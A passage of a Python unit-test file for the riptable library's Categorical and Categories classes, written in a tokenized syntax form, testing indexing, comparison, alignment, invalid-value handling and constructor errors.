country_num_codes=[36 36 344 840 840 372 840 372 840 124 840 124 36 484]<line_sep>cat1=rt.Categorical(country_num_codes country_code_dict)<assert_stmt>cat1.category_mode<eq>CategoryMode.Dictionary<line_sep># Create a single-key, string-mode Categorical.
cat2=rt.Categorical(['AUS' 'AUS' 'HKG' 'USA' 'USA' 'IRL' 'USA' 'IRL' 'USA' 'KHM' 'IRL' 'AUS' 'MEX'])<assert_stmt>cat2.category_mode<ne>CategoryMode.Dictionary<line_sep># Try to hstack the two Categoricals. This should fail due to the CategoryMode values being different.
<with_stmt>pytest.raises((ValueError TypeError))<block_start>rt.hstack([cat1 cat2])<block_end><block_end><def_stmt>test_align self<block_start>c1=Categorical(['a' 'b' 'c'])<line_sep>c2=Categorical(['d' 'e' 'f'])<line_sep>c3=Categorical(['c' 'f' 'z'])<line_sep>cm=Categorical.align([c1 c2 c3])<assert_stmt>(cm[0].as_string_array<eq>['a' 'b' 'c']).all()<assert_stmt>(cm[1].as_string_array<eq>['d' 'e' 'f']).all()<assert_stmt>(cm[2].as_string_array<eq>['c' 'f' 'z']).all()<assert_stmt>(cm[0].categories()<eq>FastArray([b'Filtered' b'a' b'b' b'c' b'd' b'e' b'f' b'z'])).all()<assert_stmt>(cm[0].categories()<eq>cm[1].categories()).all()<assert_stmt>(cm[0].categories()<eq>cm[2].categories()).all()<line_sep>c1=Categorical([1 1 3 2 2] [1 2 3 4 5] from_matlab=<true>)<line_sep>c2=Categorical([2 2 4 4 3] [1 2 3 4 5] from_matlab=<true>)<line_sep>cm=Categorical.align([c1 c2])<assert_stmt>(cm[0]<eq>[1 1 3 2 2]).all()<assert_stmt>(cm[1]<eq>[2 2 4 4 3]).all()<line_sep># Multikey with nested Categorical
c1=Categorical([Categorical(['a']) FastArray([1])])<line_sep>c2=Categorical([Categorical(['b']) FastArray([2])])<line_sep>cm=Categorical.align([c1 c2])<assert_stmt>cm[0][0]<eq>('a' 1)<assert_stmt>cm[1][0]<eq>('b' 2)<assert_stmt>cm[0].category_dict<eq>cm[1].category_dict<block_end><def_stmt>test_categorical_merge_dict self<block_start><import_from_stmt>riptable.rt_categorical categorical_merge_dict<line_sep>d1={'a':1 'b':2 'c':3 'd':4 'e':5}<line_sep>d2={'a':1 'e':5 'b':2 'f':6}<line_sep>c1=Categorical([3 3 4 3 1 2 5] d1)<line_sep>c2=Categorical([1 1 5 2 2 1 5] d2)<line_sep>combined=categorical_merge_dict([c1 c2] return_type=dict)<for_stmt>i range(1 6)<block_start><assert_stmt>i<in>combined.values()<block_end><block_end><def_stmt>test_getitem_empty self<block_start>c=Categorical([0 1 2] ['a' 'b' 'c'])<line_sep>empty_list=c[[]]<assert_stmt>isinstance(empty_list Categorical)<line_sep>dict_matches=bool(np.all(empty_list.categories()<eq>c.categories()))<assert_stmt>dict_matches<with_stmt>pytest.raises(IndexError)<block_start>empty_np=c[np.array([])]<assert_stmt>isinstance(empty_np Categorical)<line_sep>dict_matches=bool(np.all(empty_np.categories()<eq>c.categories()))<assert_stmt>dict_matches<block_end><block_end><def_stmt>test_iter_groups self<block_start>correct_keys=FastArray(['a' 'b' 'c' 'd' 'e'])<line_sep>correct_idx=[[8] [3] [5 6] [2 9] [0 1 4 7]]<line_sep>str_arr=FastArray(['e' 'e' 'd' 'b' 'e' 'c' 'c' 'e' 'a' 'd'])<line_sep>c=Categorical(str_arr)<for_stmt>i,tup enumerate(c.iter_groups())<block_start><assert_stmt>tup[0]<eq>correct_keys[i]<assert_stmt>bool(np.all(tup[1]<eq>correct_idx[i]))<block_end><block_end><def_stmt>test_enum_dict_multi self<block_start>self._notimpl()<line_sep># not implemented
<block_end><def_stmt>test_enum_init_errors self<block_start><with_stmt>pytest.raises(TypeError)<block_start>c=Categorical(['a' 'b' 'c'] LikertDecision)<block_end><block_end><def_stmt>test_custom_invalid_category self# 5/16/2019 invalid must appear in provided uniques
<block_start>c=Categorical(['a' 'b' 'c' 'my_invalid'] ['a' 'b' 'c' 'my_invalid'] invalid='my_invalid' base_index=1 )<assert_stmt>c[3]<eq>'my_invalid'<assert_stmt>c.isnan()[3]<assert_stmt>len(c.category_array)<eq>4<block_end>@pytest.mark.xfail(reason="After invalid_set, the custom invalid value is not displayed.")<def_stmt>test_invalid_set self<block_start>c=Categorical(['a' 'b' 'c' 'my_invalid'] ['a' 'b' 'c' 'my_invalid'] invalid='my_invalid' base_index=1 )<line_sep># set a new string to be displayed for invalid items and validate
custom_invalid="custom_invalid"<line_sep>c.invalid_set(custom_invalid)<assert_stmt>c[3]<eq>custom_invalid<assert_stmt>c.isnan()[3]<assert_stmt>len(c.category_array)<eq>4<block_end><def_stmt>test_lock_unlock self<block_start>self._notimpl()<line_sep># halfway implemented
<block_end><def_stmt>test_set_item self<block_start>self._notimpl()<line_sep># when index needs to be fixed after categories are added
# setitem with integer / invalid integer
# setitem with string / invalid category
<block_end><def_stmt>test_return_empty_cat self<block_start>self._notimpl()<line_sep># this code still needs to get written
<block_end><def_stmt>test_getitem_np_str self<block_start>c=Categorical(['a' 'a' 'b' 'a' 'c' 'c' 'b'])<line_sep>correct=FastArray([<true> <true> <true> <true> <false> <false> <true>])<with_stmt>pytest.raises(IndexError)<block_start>result=c[np.array(['a' 'b'])]<block_end># self.assertTrue(array_equal(result, correct), msg=f"incorrect getitem result when indexing by numpy array of strings")
<with_stmt>pytest.raises(IndexError)<block_start>result=c[np.array(['a' 'b']).astype('S')]<block_end># self.assertTrue(array_equal(result, correct), msg=f"incorrect getitem result when indexing by numpy array of strings")
<block_end><def_stmt>test_getitem_slice self<block_start>c=Categorical(['a' 'a' 'b' 'a' 'c' 'c' 'b'])<line_sep>result=c[:3]<assert_stmt>isinstance(result Categorical)<line_sep>match_fa=bool(np.all(result.view(FastArray)<eq>[1 1 2]))<assert_stmt>match_fa<assert_stmt>len(result)<eq>3<assert_stmt>len(result._categories_wrap)<eq>3<block_end><def_stmt>test_categorical_compare_check self<block_start>self._notimpl()<line_sep># Categories have different modes
# categories are both enum
# compare cat to empty list
# non-categorical input
# convert all to unicode if one is unicode
<block_end># this keyword wasn't used anywhere, removed from copy()
# def test_copy_invalid(self):
# c = Categorical(['a','a','b','a','c','c','b'])
# invalid_copy = c.copy(fill_invalid=True)
# all_invalid = bool(np.all(invalid_copy.view(FastArray)==-128))
# self.assertTrue(all_invalid)
# for idx, item in enumerate(c.categories()):
# self.assertEqual(item, invalid_copy.categories()[idx])
# self.assertFalse(c.categories() is invalid_copy.categories())
<def_stmt>test_fill_invalid self<block_start>values=list('aabaccb')<line_sep>c=Categorical(values base_index=1)<line_sep>c.fill_invalid(inplace=<true>)<line_sep>assert_array_equal(FastArray([c.filtered_name]<times>len(values)) c.expand_array)<line_sep>assert_array_equal(FastArray([0]<times>len(values)) c._fa)<line_sep>expected=FastArray(sorted(set(values))).astype('|S1')<line_sep>assert_array_equal(expected c.category_array)<line_sep>assert_array_equal(expected c.category_dict[next(iter(c.category_dict))])<block_end># values of first key
<def_stmt>test_force_unicode self<block_start>c=Categorical(['a' 'a' 'b' 'a' 'c' 'c' 'b'] unicode=<true>)<line_sep>result_dtype=c.categories().dtype.char<assert_stmt>result_dtype<eq>'U' f"Failed to force unicode when constructing categorical from list of string values"<block_end><def_stmt>test_categories_shallow_copy self<block_start>codes=[10 10 20 10 30 20 10]<line_sep>d={10:'a' 20:'b' 30:'c'}<line_sep>c=Categorical(codes d)<line_sep>original_cats=c._categories_wrap<line_sep>new_cats=original_cats.copy(deep=<false>)<assert_stmt>(original_cats._str_to_int_dict<is>new_cats._str_to_int_dict) f"Categories did not use same str_to_int dictionary after shallow copy."<assert_stmt>(original_cats._int_to_str_dict<is>new_cats._int_to_str_dict) f"Categories did not use same int_to_str dictionary after shallow copy."<block_end># 5/16/2019 invalid category must be in user provided
# def test_two_lists_invalid(self):
# c = Categorical(['a','a','b','a','c','c','b'],np.array(['a','b']), invalid='inv', base_index=1)
# self.assertEqual(c[4],FILTERED_LONG_NAME)
@pytest.mark.xfail(reason='20200416 This test was previously overridden by a later test in the file with the same name. Need to revisit and get back in a working state.')<def_stmt>test_getitem_enum_list self<block_start>c=Categorical([44 133 133 75 144 1] LikertDecision)<with_stmt>pytest.raises(IndexError)<block_start>result=c[[b'NeitherAgreeNorDisagree']]<block_end>correct=FastArray([<false> <false> <false> <false> <true> <false>])<line_sep># self.assertTrue(array_equal(result, correct))
result=c[[4]]<assert_stmt>result[0]<eq>'NeitherAgreeNorDisagree'<block_end><def_stmt>test_non_unique self<block_start><with_stmt>pytest.raises(ValueError)<block_start>c=Categorical(['a' 'a' 'b' 'a' 'c' 'c' 'b'] ['a' 'a' 'b'])<block_end><block_end><def_stmt>test_match_to_category self<block_start>c=Categorical(['a' 'a' 'b' 'a' 'c' 'c' 'b'])<line_sep>result=c._categories_wrap.match_str_to_category('a')<assert_stmt>b'a'<eq>result<with_stmt>pytest.raises(TypeError)<block_start>result=c._categories_wrap.match_str_to_category([1 2 3])<block_end><with_stmt>pytest.raises(TypeError)<block_start>result=c._categories_wrap.match_str_to_category({1 2 3})<block_end>c1=Categorical(['abc' 'def' 'abc' 'abc'] np.array(['abc' 'def']) unicode=<true>)<line_sep>result=c1._categories_wrap.match_str_to_category([b'a'])<assert_stmt>result.dtype.char<eq>'U'<block_end># ------------------------------------TEST SET ITEM------------------------------------------
<def_stmt>test_set_item_str_index self<block_start>c=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b'])<line_sep>correct=[2 2 2 2 2 2]<line_sep>c['a']='b'<line_sep>is_correct=bool(np.all(c.view(FastArray)<eq>correct))<assert_stmt>is_correct f"Category was not correctly changed with set item on a string."<with_stmt>pytest.raises(ValueError)<block_start>c['b']='c'<block_end><block_end><def_stmt>test_set_item_int_index self<block_start>c=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b'])<line_sep>correct=[1 2 2 1 2 2]<line_sep>c[0]='a'<line_sep>is_correct=bool(np.all(c.view(FastArray)<eq>correct))<assert_stmt>is_correct f"Category was not correctly changed with set item on an int."<with_stmt>pytest.raises(ValueError)<block_start>c[0]='c'<block_end><block_end># ------------------------------------TEST CALCULATE DTYPE ----------------------------------
<def_stmt>test_get_dtype_from_len self<block_start>'''
Categorical selects different integer dtypes for its codes based on the number of unique categories.
'''<line_sep>dtype_sizes={np.int8:1 np.int16:101 np.int32:50001 }<line_sep># , np.int64:2000000001 }
<for_stmt>dt,sz dtype_sizes.items()<block_start>LENGTH=6<line_sep>NO_CODES=sz<line_sep>alphabet=list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')<line_sep>np_alphabet=np.array(alphabet dtype="|U1")<line_sep>np_codes=np.random.choice(np_alphabet [NO_CODES LENGTH])<line_sep>codes=["".join(np_codes[i])<for>i range(len(np_codes))]<line_sep>c=Categorical(["".join(np_codes[i])<for>i range(len(np_codes))])<line_sep># only perform the test if there are enough uniques
<if_stmt>len(c._categories_wrap._list)<ge>sz<block_start><assert_stmt>c.dtype<eq>dt f"Categorical did not set dtype to {dt} for array of size {sz}."<block_end><block_end><block_end># -------SINGLE INTEGER
<def_stmt>test_getitem_int self<block_start>'''
Single integer index should return the corresponding category in unicode format.
'''<line_sep>c=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b'])<assert_stmt>c[0]<eq>'b' f"Get item with integer did not return the correct category."<assert_stmt>isinstance(c[0] str) f"Get item with integer did not return as unicode."<assert_stmt>c[3]<eq>'a' f"Get item with integer did not return the correct category."<assert_stmt>isinstance(c[3] str) f"Get item with integer did not return as unicode."<with_stmt>pytest.raises(IndexError)<block_start>d=c[10]<block_end><block_end># --------INTEGER MASK
<def_stmt>test_getitem_int_mask self<block_start>py_mask=[0 3]<line_sep>c=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b'])<for_stmt>mask [py_mask np.array(py_mask)]<block_start>d=c[mask]<assert_stmt>isinstance(d Categorical) f"Get item with integer mask did not return a categorical. Returned {type(d).__name__} instead."<assert_stmt>len(d)<eq>len(mask) f"Get item with integer mask did not return categorical of {len(mask)}. returned {len(d)} instead."<line_sep>has_same_cats=bool(np.all(d._categories_wrap._list<eq>c._categories_wrap._list))<assert_stmt>(has_same_cats) f"Failed to copy the same categories to new categorical after getitem with integer mask."<line_sep>d=c[[0 10]]<assert_stmt>d._fa[1]<eq>0 f"Failed to put invalid for out of range index."<block_end><block_end># -------BOOLEAN MASK
<def_stmt>test_getitem_bool_mask self<block_start>py_mask=[<true> <true> <true> <false> <true> <true>]<line_sep>c=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b'])<for_stmt>mask [py_mask np.array(py_mask)]<block_start>d=c[mask]<assert_stmt><not>(b'a'<in>d.as_string_array) f"b'a' does not get trimmed out of categorical with getitem from boolean array."<assert_stmt>5<eq>len(d) f"Length {len(d)} did not match 5 in categorical getitem with a boolean array of the same size."<line_sep>has_same_cats=bool(np.all(d._categories_wrap._list<eq>c._categories_wrap._list))<assert_stmt>(has_same_cats) f"Failed to copy the same categories to new categorical after getitem with integer mask."<block_end><block_end># -------SINGLE STRING
<def_stmt>test_getitem_single_string self<block_start>b_result=[<true> <true> <true> <false> <true> <true>]<line_sep>c=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b'])<line_sep>idx=b'c'<line_sep># with self.assertRaises(IndexError):
d=c[idx]<line_sep>has_true=bool(np.any(d))<assert_stmt><not>has_true f"Failed to return an array of all false for getitem with {idx}"<assert_stmt>isinstance(d FastArray) f"Get item input {idx} did not return FastArray"<assert_stmt>d.dtype.char<eq>'?' f"Get item input {idx} did not return FastArray"<line_sep>idx=idx.decode()<line_sep># with self.assertRaises(IndexError):
d=c[idx]<line_sep>has_true=bool(np.any(d))<assert_stmt><not>has_true f"Failed to return an array of all false for getitem with {idx}"<assert_stmt>isinstance(d FastArray) f"Get item input {idx} did not return FastArray"<assert_stmt>d.dtype.char<eq>'?' f"Get item input {idx} did not return FastArray"<line_sep>idx=b'b'<line_sep># with self.assertRaises(IndexError):
d=c[idx]<line_sep>is_correct=bool(np.all(d<eq>b_result))<assert_stmt>is_correct f"Did not return the correct array for getitem with {idx}"<assert_stmt>isinstance(d FastArray) f"Get item input {idx} did not return FastArray"<assert_stmt>d.dtype.char<eq>'?' f"Get item input {idx} did not return FastArray"<line_sep>idx=idx.decode()<line_sep># with self.assertRaises(IndexError):
d=c[idx]<line_sep>is_correct=bool(np.all(d<eq>b_result))<assert_stmt>is_correct f"Did not return the correct array for getitem with {idx}"<assert_stmt>isinstance(d FastArray) f"Get item input {idx} did not return FastArray"<assert_stmt>d.dtype.char<eq>'?' f"Get item input {idx} did not return FastArray"<block_end># ------MULTIPLE STRINGS
<def_stmt>test_getitem_multiple_strings self<block_start>c=Categorical(['b' 'b' 'b' 'a' 'b' 'b'])<line_sep>inputs={(b'b' ):[<true> <true> <true> <false> <true> <true>] # single in (list)
(b'c' ):[<false> <false> <false> <false> <false> <false>] # single not in (list)
(b'a' b'b'):[<true> <true> <true> <true> <true> <true>] # both in (list)
(b'c' b'd'):[<false> <false> <false> <false> <false> <false> ] # both not in (list)
(b'b' b'c'):[<true> <true> <true> <false> <true> <true>] # mixed (list)
}<for_stmt>idx,correct inputs.items()<block_start>idx=list(idx)<line_sep>d=c[idx]<line_sep>is_correct=bool(np.all(d<eq>correct))<assert_stmt>is_correct f"Indexing categorical {c} by {idx} did not return the correct result."<assert_stmt>d.dtype.char<eq>'?' f"Get item input {idx} did not return FastArray"<line_sep>idx=[b.decode()<for>b idx]<line_sep>d=c[idx]<line_sep>is_correct=bool(np.all(d<eq>correct))<assert_stmt>is_correct f"Indexing categorical {c} by {idx} did not return the correct result."<assert_stmt>d.dtype.char<eq>'?' f"Get item input {idx} did not return FastArray"<block_end><block_end># ------NUMERIC GETITEM
<def_stmt>test_getitem_numeric_categories self# before the fix, a bug caused getitem to return a string representation of the numeric category
<block_start>nums=np.array([1 1 2 3 4 5 1 1 1])<line_sep>c=Categorical(nums)<assert_stmt>c[0]<eq>1<assert_stmt>isinstance(c[0] (int np.integer))<line_sep>nums=nums.astype(np.float32)<line_sep>c=Categorical(nums)<assert_stmt>c[0]<eq>1.0<assert_stmt>isinstance(c[0] (float np.floating)) f"Expected float, got {type(c[0])}"<block_end># ------------------------- TEST COMPARE CHECK -------------------------------------------
<def_stmt>test_compare_check self<block_start>'''
Test comparison between two 'equal' categoricals with different underlying arrays.
'''<line_sep>compare_ops={'__ne__':[<false> <false> <false> <false> <false> <false>] '__eq__':[<true> <true> <true> <true> <true> <true>] '__ge__':[<true> <true> <true> <true> <true> <true>] '__gt__':[<false> <false> <false> <false> <false> <false>] '__le__':[<true> <true> <true> <true> <true> <true>] '__lt__':[<false> <false> <false> <false> <false> <false>] }<line_sep>c=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b' 'c'])<line_sep>d=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b'])<for_stmt>name,correct compare_ops.items()<block_start>func=c.__getattribute__(name)<line_sep>result=func(d)<line_sep>is_correct=bool(np.all(result<eq>correct))<assert_stmt>is_correct f"Compare operation betweeen two equal categoricals did not return the correct result."<block_end><block_end><def_stmt>test_compare_return_type self<block_start>'''
Test comparison operations with single strings to make sure FastArray of boolean is returned.
'''<line_sep>c=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b'])<line_sep>scalars=['a' 'c']<line_sep>compare_ops=['__ne__' '__eq__' '__ge__' '__gt__' '__le__' '__lt__']<for_stmt>s scalars<block_start><for_stmt>op compare_ops<block_start>func=c.__getattribute__(op)<line_sep>result=func(s)<assert_stmt>isinstance(result FastArray) f"comparison {op} with input {s} did not return FastArray"<assert_stmt>result.dtype.char<eq>'?' f"comparison {op} with input {s} did not return boolean"<block_end><block_end><block_end><def_stmt>test_compare_different_modes self<block_start>c1=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b'])<line_sep>c2=Categorical([0 1] {0:'a' 1:'b'})<with_stmt>pytest.raises(TypeError)<block_start>c1<eq>c2<block_end><block_end><def_stmt>test_compare_conflicting_dicts self<block_start>c1=Categorical([0 1] {0:'a' 1:'b'})<line_sep>c2=Categorical([0 1] {1:'a' 0:'b'})<with_stmt>pytest.raises(ValueError)<block_start>c1<eq>c2<block_end><block_end><def_stmt>test_compare_safe_dicts self<block_start>c1=Categorical([0 1] {0:'a' 1:'b'})<line_sep>c2=Categorical([2 1] {2:'c' 1:'b'})<line_sep>correct=FastArray([<false> <true>])<line_sep>result=c1<eq>c2<line_sep>match=bool(np.all(correct<eq>result))<assert_stmt>match<block_end><def_stmt>test_isnan self<block_start>c=Categorical([1 1 3 2 2] ['a' 'b' 'c'] base_index=1 invalid='a')<line_sep>is_correct=[<true> <true> <false> <false> <false>]<line_sep>is_not_correct=[<false> <false> <true> <true> <true>]<assert_stmt>bool(np.all(is_correct<eq>isnan(c)))<assert_stmt>bool(np.all(is_correct<eq>c.isnan()))<assert_stmt>bool(np.all(is_not_correct<eq>isnotnan(c)))<assert_stmt>bool(np.all(is_not_correct<eq>c.isnotnan()))<block_end># ------------------------------------------------------
<def_stmt>test_get_categories self# string list
<block_start>c=Categorical(['a' 'b' 'c' 'd' 'e'])<line_sep>catsarray=c.category_array<assert_stmt>isinstance(catsarray np.ndarray)<line_sep>catsdict=c.category_dict<assert_stmt>isinstance(catsdict dict)<assert_stmt>len(catsdict)<eq>1<with_stmt>pytest.raises(TypeError)<block_start>catscodes=c.category_codes<block_end><with_stmt>pytest.raises(TypeError)<block_start>catsmapping=c.category_mapping<block_end># numeric list
c=Categorical(np.array([1 2 3 4 5]))<line_sep>catsarray=c.category_array<assert_stmt>isinstance(catsarray np.ndarray)<line_sep>catsdict=c.category_dict<assert_stmt>isinstance(catsdict dict)<assert_stmt>len(catsdict)<eq>1<with_stmt>pytest.raises(TypeError)<block_start>catscodes=c.category_codes<block_end><with_stmt>pytest.raises(TypeError)<block_start>catsmapping=c.category_mapping<block_end># dict/enum
c=Categorical([1 2 3 4] {1:'a' 2:'b' 3:'c' 4:'d'})<line_sep>catsarray=c.category_array<assert_stmt>isinstance(catsarray np.ndarray)<line_sep>catsdict=c.category_dict<assert_stmt>isinstance(catsdict dict)<assert_stmt>len(catsdict)<eq>1<line_sep>catscodes=c.category_codes<assert_stmt>isinstance(catscodes np.ndarray)<line_sep>catsmapping=c.category_mapping<assert_stmt>isinstance(catsmapping dict)<line_sep># multikey
c=Categorical([np.arange(5) np.random.rand(5)])<with_stmt>pytest.raises(TypeError)<block_start>catsarray=c.category_array<block_end>catsdict=c.category_dict<assert_stmt>isinstance(catsdict dict)<assert_stmt>len(catsdict)<eq>2<with_stmt>pytest.raises(TypeError)<block_start>catscodes=c.category_codes<block_end><with_stmt>pytest.raises(TypeError)<block_start>catsmapping=c.category_mapping<block_end><block_end># ------------------------------------------------------
<def_stmt>test_force_base_index2 self<block_start>c=Categorical(['a' 'a' 'b' 'c' 'a'])<assert_stmt>c.base_index<eq>1<assert_stmt>c._fa[0]<eq>1<line_sep>c=Categorical(['a' 'a' 'b' 'c' 'a'] base_index=0)<assert_stmt>c.base_index<eq>0<assert_stmt>c._fa[0]<eq>0<line_sep>codes=np.array([0 0 1 2 0])<line_sep>cats=np.array(['a' 'b' 'c'])<line_sep># c = Categorical(codes, cats)
# self.assertEqual(c.base_index, 0)
# self.assertEqual(c._fa[0], 0)
codes<augadd>1<line_sep>c=Categorical(codes cats base_index=1)<assert_stmt>c.base_index<eq>1<assert_stmt>c._fa[0]<eq>1<line_sep>codes=codes.astype(np.float32)<line_sep>c=Categorical(codes cats from_matlab=<true>)<assert_stmt>c.base_index<eq>1<assert_stmt>c._fa[0]<eq>1<with_stmt>pytest.raises(ValueError)<block_start>c=Categorical(codes cats from_matlab=<true> base_index=0)<block_end>c=Categorical(np.array(['a' 'a' 'b' 'c' 'a']) np.array(['a' 'b' 'c']))<assert_stmt>c.base_index<eq>1<assert_stmt>c._fa[0]<eq>1<line_sep>c=Categorical(np.array(['a' 'a' 'b' 'c' 'a']) np.array(['a' 'b' 'c']) base_index=0)<assert_stmt>c.base_index<eq>0<assert_stmt>c._fa[0]<eq>0<block_end># ------------------------------------------------------
<def_stmt>test_ordered self<block_start>c=Categorical(['c' 'c' 'a' 'b' 'c'])<line_sep>cats=c.category_array<assert_stmt>cats[0]<eq>b'a'<line_sep>c=Categorical(['c' 'c' 'a' 'b' 'c'] ordered=<false>)<line_sep>cats=c.category_array<assert_stmt>cats[0]<eq>b'c'<line_sep>c=Categorical(['c' 'c' 'a' 'b' 'c'] ['c' 'a' 'b'])<line_sep>cats=c.category_array<assert_stmt>cats[0]<eq>b'c'<assert_stmt><not>c.ordered<line_sep>c=Categorical(['c' 'c' 'a' 'b' 'c'] ['a' 'b' 'c'])<assert_stmt>c.ordered<line_sep>## removed this test - side-effect of search sorted with unsorted array (not categorical related)
## false claim that categories are ordered in keyword
# c = Categorical(['c','c','a','c','c'], ['c','a','b'], ordered=True)
# self.assertTrue(bool(np.all(c!='c')))
# self.assertTrue(bool(np.all(c!=b'c')))
c=Categorical(['c' 'c' 'a' 'b' 'c'] ['c' 'a' 'b'] ordered=<false>)<line_sep>cats=c.category_array<assert_stmt>cats[0]<eq>b'c'<assert_stmt><not>c.ordered<line_sep>codes=FastArray([0 0 1 2 0])<line_sep>cats=FastArray(['c' 'b' 'a'] unicode=<true>)<line_sep>c=Categorical(codes cats)<assert_stmt>c.category_array[0]<eq>'c'<assert_stmt><not>c.ordered<line_sep># with self.assertWarns(UserWarning):
# c = Categorical(codes, cats, ordered=True)
# self.assertEqual(c.category_array[0], b'c')
# self.assertFalse(c.ordered)
<block_end># ------------------------------------------------------
<def_stmt>test_keywords_not_allowed self# filter + base index 0
<block_start>f=np.array([<true> <false> <true>])<with_stmt>pytest.raises(ValueError)<block_start>c=Categorical(['a' 'b' 'c'] filter=f base_index=0)<block_end><block_end># ------------------------------------------------------
<def_stmt>test_display_properties self<block_start>'''
Categoricals override their display properties so that they appear as strings (not the underlying integer array)
(see Utils.rt_display_properties)
'''<line_sep>c=Categorical(['b' 'b' 'b' 'a' 'b' 'b'] ['a' 'b'])<line_sep>item_format,convert_func=c.display_query_properties()<assert_stmt>item_format.length<eq>DisplayLength.Long f"Incorrect length for item format."<assert_stmt>item_format.justification<eq>DisplayJustification.Left<assert_stmt>item_format.invalid<eq><none><assert_stmt>item_format.can_have_spaces<eq><true><assert_stmt>item_format.decoration<eq><none><assert_stmt>item_format.color<eq>DisplayColumnColors.Default<assert_stmt>convert_func.__name__<eq>'display_convert_func'<line_sep># this could change, right now the convert function just does a str over the item
<assert_stmt>convert_func(1 item_format)<eq>'1' f"Incorrect convert function was returned."<block_end># ------------------------------------------------------
# -----MISC. COVER TESTS--------------------------------
<def_stmt>test_non_array_dict_categories_ctor self<block_start><with_stmt>pytest.raises(TypeError)<block_start>c=Categories(['garbage' 'list'])<block_end><block_end><def_stmt>test_too_many_args_categories_ctor self<block_start><with_stmt>pytest.raises(ValueError)<block_start>c=Categories(FastArray([1]) FastArray([2]) FastArray([3]))<block_end><block_end><def_stmt>test_filter_and_invalid self<block_start>c=Categorical(['a' 'a' 'b' 'c' 'c'] ['c'] invalid='a' filter=FastArray([<true> <true> <false> <true> <true>]) )<line_sep>c.filtered_set_name('a')<assert_stmt>bool(np.all(c._fa<eq>[0 0 0 1 1]))<for_stmt>i range(3)<block_start><assert_stmt>c[i]<eq>'a'<block_end><for_stmt>i range(3 5)<block_start><assert_stmt>c[i]<eq>'c'<block_end><block_end><def_stmt>test_zero_base_with_invalid self<block_start><with_stmt>pytest.raises(ValueError)<block_start>c=Categorical(['a' 'b' 'c'] ['b' 'c'] base_index=0)<block_end><block_end># removed this property from Categories 04/24/2019
# def test_multikey_labels(self):
# c = Categorical([FastArray(['a','b','c']), FastArray([1,2,3])])
# labels = c._categories_wrap.multikey_labels
# self.assertTrue(isinstance(labels[0], tuple))
# self.assertEqual(labels[0][0],'a')
<def_stmt>test_ncols_non_multikey self<block_start>c=Categorical(['a' 'b' 'c'])<assert_stmt>c._categories_wrap.ncols<eq>1<block_end># now checks for single / multikey / enum, not CategoryMode
# def test_len_undefined_mode(self):
# c = Categorical(['a','b','c'])
# c._categories_wrap._mode = CategoryMode.Default
# self.assertEqual(len(c._categories_wrap),0)
<def_stmt>test_categories_copy_shallow self<block_start>c=Categorical(['a' 'b' 'c'])<line_sep>copycat=c._categories_wrap.copy(deep=<false>)<assert_stmt>isinstance(copycat Categories)<block_end><def_stmt>test_categories_copy_deep self<block_start>c=Categorical([1 2 3] {1:'a' 2:'b' 3:'c'})<line_sep>copycat=c._categories_wrap.copy(deep=<false>)<assert_stmt>isinstance(copycat Categories)<line_sep># impossible path, unless mode is forced like below. disabling 4/24/2019
# c._categories_wrap._mode = CategoryMode.Default
# with self.assertRaises(NotImplementedError):
# c = c._categories_wrap.copy()
<block_end><def_stmt>test_wrap_get_categories self<block_start>c=Categorical(['a' 'b' 'c'])<line_sep>arr=c._categories_wrap.get_categories()<assert_stmt>isinstance(arr FastArray)<line_sep>c=Categorical([FastArray(['a' 'b' 'c']) FastArray([1 2 3])])<line_sep>d=c._categories_wrap.get_categories()<assert_stmt>isinstance(d dict)<block_end><def_stmt>test_get_string_mode_nums self<block_start>c=Categorical(np.arange(5))<assert_stmt><not>c._categories_wrap.isbytes<assert_stmt><not>c._categories_wrap.isunicode<block_end><def_stmt>test_pop_single_arr self<block_start>c=Categorical([np.array(['a' 'b' 'c'])])<line_sep>d=Categorical(np.array(['a' 'b' 'c']))<assert_stmt>bool(np.all(c<eq>d))<line_sep>c=Categorical({'test':np.array(['a' 'b' 'c'])})<line_sep>d=Categorical(np.array(['a' 'b' 'c']))<assert_stmt>bool(np.all(c<eq>d))<block_end><def_stmt>test_from_cat_as_array self<block_start>c=Categorical(FastArray([1 2 3]) _from_categorical=np.array(['a' 'b' 'c']))<assert_stmt>isinstance(c.category_array FastArray)<assert_stmt>c.base_index<eq>1<block_end><def_stmt>test_from_pandas_object self<block_start>pdc=pd.Categorical(['a' 'b' 'c'])<line_sep>c=Categorical(pdc unicode=<true>)<assert_stmt>c.category_array.dtype.char<eq>'U'<line_sep>c=Categorical(pdc unicode=<false>)<assert_stmt>c.category_array.dtype.char<eq>'S'<line_sep>pdc=pd.Categorical(three_unicode)<line_sep>c=Categorical(pdc)<assert_stmt>c.category_array.dtype.char<eq>'U'<block_end><def_stmt>test_empty_init self<block_start><with_stmt>pytest.raises(ValueError)<block_start>c=Categorical({})<block_end><with_stmt>pytest.raises(ValueError)<block_start>c=Categorical([])<block_end><block_end><def_stmt>test_multi_with_cats self<block_start><with_stmt>pytest.raises(NotImplementedError)<block_start>c=Categorical([FastArray(['a' 'b' 'c' 'a']) FastArray([1 2 3 1])] [FastArray(['a' 'b' 'c']) FastArray([1 2 3])] )<block_end><block_end># 5/9/2019 removed this warning to reduce constructor paths
# def test_unicode_warn(self):
# with self.assertWarns(UserWarning):
# c = Categorical([1,2,3],{1:'a',2:'b',3:'c'}, unicode=False)
